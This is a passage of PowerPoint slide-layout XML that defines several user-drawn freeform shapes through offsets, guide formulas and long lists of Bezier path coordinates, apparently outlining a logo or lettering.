                <a:off x="5330"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Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31"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325"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155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2" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>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Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="1473"/>
                <a:ext cx="78"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6 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17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Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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333"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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7" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27"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5"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Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="1460"/>
                <a:ext cx="218"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60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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 187 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160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9 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 45 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 49 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59 h 209"/>
                  <a:gd name="T98" fmla="*/ 86 w 179"/>
                  <a:gd name="T99" fmla="*/ 68 h 209"/>
                  <a:gd name="T100" fmla="*/ 71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6"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="209"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="199"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="71" y="200"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="197"/>
                      <a:pt x="4" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="8" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="183"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="146"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="98"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="159" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="158"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="153"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="150"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="84" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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5"/>
                      <a:pt x="86" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="71"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="118"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="131"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="141"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="147"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="158"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="198"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="185"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="186"/>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9"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
